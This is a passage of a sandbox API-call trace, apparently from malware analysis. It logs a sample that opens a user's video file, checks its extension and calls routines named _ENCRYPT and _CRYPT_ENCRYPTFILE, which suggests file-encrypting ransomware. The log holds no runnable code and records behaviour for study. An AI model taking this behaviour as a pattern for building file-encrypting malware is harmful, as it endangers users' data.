dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0193.151] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3586, lpOverlapped=0x0) returned 1 [0193.151] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0193.151] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3586, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.151] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0193.151] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.151] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.151] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.151] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.151] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0193.152] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0193.152] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0193.152] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0193.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0193.152] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0193.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0193.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0193.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd648 [0193.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd648, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0193.153] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\vgkx.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0193.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0193.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0193.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0193.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0193.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0193.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0193.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0193.153] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.154] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0193.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0193.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0193.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0193.154] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0193.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0193.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0193.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0193.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd3f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0193.154] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0193.154] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0193.154] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0193.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0193.154] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdac5c230, ftCreationTime.dwHighDateTime=0x1d5e3ca, ftLastAccessTime.dwLowDateTime=0x34054cb0, ftLastAccessTime.dwHighDateTime=0x1d5d919, ftLastWriteTime.dwLowDateTime=0x34054cb0, ftLastWriteTime.dwHighDateTime=0x1d5d919, nFileSizeHigh=0x0, nFileSizeLow=0x14d15, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="VGkX.swf", cAlternateFileName="")) returned 0x90add8 [0193.155] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0193.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0193.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0193.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0193.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0193.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0193.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0193.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0193.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0193.156] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdac5c230, ftCreationTime.dwHighDateTime=0x1d5e3ca, ftLastAccessTime.dwLowDateTime=0x34054cb0, ftLastAccessTime.dwHighDateTime=0x1d5d919, ftLastWriteTime.dwLowDateTime=0x34054cb0, ftLastWriteTime.dwHighDateTime=0x1d5d919, nFileSizeHigh=0x0, nFileSizeLow=0x14d15, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="VGkX.swf", cAlternateFileName="")) returned 0x90add8 [0193.156] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0193.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0193.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0193.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0193.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0193.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0193.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0193.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0193.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0193.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0193.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0193.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0193.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0193.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ffd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fd495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="495B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="95B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eqP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qP\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\VGkX.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90add8 [0193.160] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0193.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0193.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0193.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0193.160] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0193.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0193.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0193.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0193.161] RtlAllocateHeap 